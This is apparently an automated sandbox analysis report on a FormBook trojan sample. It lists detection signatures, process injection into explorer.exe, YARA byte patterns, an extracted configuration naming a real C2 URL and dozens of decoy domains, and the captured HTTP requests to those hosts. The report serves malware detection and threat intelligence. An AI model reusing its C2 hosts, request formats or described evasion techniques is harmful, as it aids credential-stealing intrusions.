Windows Analysis Report
YSpCB8DEek.exe

Overview

General Information

Sample Name: YSpCB8DEek.exe
Original Sample Name: d927de8cecb8523b956d2bb2098d20ef.exe
Analysis ID: 825979
MD5: d927de8cecb8523b956d2bb2098d20ef
SHA1: cb01b1c8bea968c8919c7303d10ec5b4c520691c
SHA256: e2f96798a7d58ac8a06c39d4459336c8fddafec67fe12cda3c9d4e497702601f
Tags: 32, exe, trojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • YSpCB8DEek.exe (PID: 5880 cmdline: C:\Users\user\Desktop\YSpCB8DEek.exe MD5: D927DE8CECB8523B956D2BB2098D20EF)
    • afhjjq.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq MD5: 6C148CA1A207DD5BE97C1726A9F4BABF)
      • afhjjq.exe (PID: 2236 cmdline: C:\Users\user\AppData\Local\Temp\afhjjq.exe MD5: 6C148CA1A207DD5BE97C1726A9F4BABF)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 4980 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
            • cmd.exe (PID: 5280 cmdline: /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.n7m.tokyo/nes8/"], "decoy": ["simantsfamily.com", "ninobrowndelivery.net", "y94x.info", "huibi01.vip", "davidspanu.com", "swegon.tech", "moapulsa.com", "coveredseguros.com", "owltoon.site", "loyalguardianop.com", "banca-particulares.icu", "innovativanimal.com", "girlschools.top", "smartbed-gb-tok.life", "vhail.store", "bluffdalecitizens.info", "asmcpn.us", "wordybag.online", "smmfsa.com", "jinglunqhd.com", "mybestfurend.com", "hatmam.com", "kruz56.site", "drinkarakay.com", "linnus.shop", "shockgods.net", "adammushrooms.com", "enakslot.net", "tt0738.com", "vivre-lyon7.com", "oticascarol.live", "precisionradiologyin.com", "prvtg.top", "naturetechvr.com", "thegoodfunguy.com", "soulcommunication.site", "hallmarklog.live", "cantonbourbonroom.com", "mitsubishixpander.com", "dgrjzz1688.com", "rainbow-bridge.xyz", "yaxin376.com", "sonrisasica.com", "letterkennytown.com", "kkkrobesforwhitesonly.com", "mikamiyua.xyz", "navigatoral.ltd", "dailyhoroscope4you.space", "dietoll-official.site", "hadafsazan.net", "mommysleepswithers.com", "abc-notation.com", "tbsc766.store", "marketproinv.info", "culdshn.pics", "oxylabs.top", "incentiveexcellence.com", "sarodret.buzz", "weplaycrypto.net", "purityrecruitment.com", "s95wh.icu", "voip-59118.com", "righttowrescue.com", "feffco.xyz"]}
Source | Rule | Description | Author | Strings
00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      1.2.afhjjq.exe.12f0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        1.2.afhjjq.exe.12f0000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.afhjjq.exe.12f0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.afhjjq.exe.12f0000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.afhjjq.exe.12f0000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: YSpCB8DEek.exe | ReversingLabs: Detection: 48%
          Source: Yara match | File source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe | Avira: detection malicious, Label: HEUR/AGEN.1242497
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe | ReversingLabs: Detection: 29%
          Source: YSpCB8DEek.exe | Joe Sandbox ML: detected
          Source: 1.2.afhjjq.exe.12f0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.afhjjq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.n7m.tokyo/nes8/"], "decoy": ["simantsfamily.com", "ninobrowndelivery.net", "y94x.info", "huibi01.vip", "davidspanu.com", "swegon.tech", "moapulsa.com", "coveredseguros.com", "owltoon.site", "loyalguardianop.com", "banca-particulares.icu", "innovativanimal.com", "girlschools.top", "smartbed-gb-tok.life", "vhail.store", "bluffdalecitizens.info", "asmcpn.us", "wordybag.online", "smmfsa.com", "jinglunqhd.com", "mybestfurend.com", "hatmam.com", "kruz56.site", "drinkarakay.com", "linnus.shop", "shockgods.net", "adammushrooms.com", "enakslot.net", "tt0738.com", "vivre-lyon7.com", "oticascarol.live", "precisionradiologyin.com", "prvtg.top", "naturetechvr.com", "thegoodfunguy.com", "soulcommunication.site", "hallmarklog.live", "cantonbourbonroom.com", "mitsubishixpander.com", "dgrjzz1688.com", "rainbow-bridge.xyz", "yaxin376.com", "sonrisasica.com", "letterkennytown.com", "kkkrobesforwhitesonly.com", "mikamiyua.xyz", "navigatoral.ltd", "dailyhoroscope4you.space", "dietoll-official.site", "hadafsazan.net", "mommysleepswithers.com", "abc-notation.com", "tbsc766.store", "marketproinv.info", "culdshn.pics", "oxylabs.top", "incentiveexcellence.com", "sarodret.buzz", "weplaycrypto.net", "purityrecruitment.com", "s95wh.icu", "voip-59118.com", "righttowrescue.com", "feffco.xyz"]}
          Source: YSpCB8DEek.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: YSpCB8DEek.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\YSpCB8DEek.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\YSpCB8DEek.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\YSpCB8DEek.exe | Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe | Code function: 4x nop then pop esi, 2_2_00417284
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe | Code function: 4x nop then pop ebx, 2_2_00407B1A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe | Code function: 4x nop then pop edi, 2_2_00417D32

          Networking

          Source: C:\Windows\explorer.exe | Domain query: www.swegon.tech
          Source: C:\Windows\explorer.exe | Network Connect: 170.33.13.246 80
          Source: C:\Windows\explorer.exe | Domain query: www.linnus.shop
          Source: C:\Windows\explorer.exe | Domain query: www.incentiveexcellence.com
          Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.113.136.229 80
          Source: Malware configuration extractor | URLs: www.n7m.tokyo/nes8/
          Source: Joe Sandbox View | ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global traffic | HTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1 Host: www.swegon.tech Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1 Host: www.swegon.tech Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1 Host: www.linnus.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1 Host: www.incentiveexcellence.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View | IP Address: 2.57.90.16 2.57.90.16
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Tue, 14 Mar 2023 06:26:26 GMT Content-Type: text/html Content-Length: 677 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&amp;5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6</td></tr><tr><td>Server:</td><td>izj6c7rml031xf17m0lnliz</td></tr><tr><td>Date:</td><td>2023/03/14 14:26:26</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 14 Mar 2023 06:26:47 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 14 Mar 2023 12:03:40 GMT Server: Apache/1.3.19 (Unix) FrontPage/5.0.2.2510 Connection: close Transfer-Encoding: chunked Content-Type: text/html Data Ascii: 148<html><head><title>This domain is registered - incentiveexcellence.com</title></head><frameset rows="35,*"><frame scrolling="no" frameborder="0" src="http://redirect.aaaq.com/header.html"><frame scrolling="auto" frameborder="0" src="http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com"></frameset></html>
          Source: YSpCB8DEek.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://redirect.aaaq.com/header.html
          Source: explorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com
          Source: explorer.exe, 00000003.00000002.572601902.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.335123598.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321913311.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586876911.000000000ED28000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com/nes8/www.purityrecruitment.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com/nes8/www.yaxin376.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com/nes8/www.hadafsazan.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop/nes8/www.incentiveexcellence.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shopReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info/nes8/www.prvtg.top
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.infoReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo/nes8/www.jinglunqhd.com
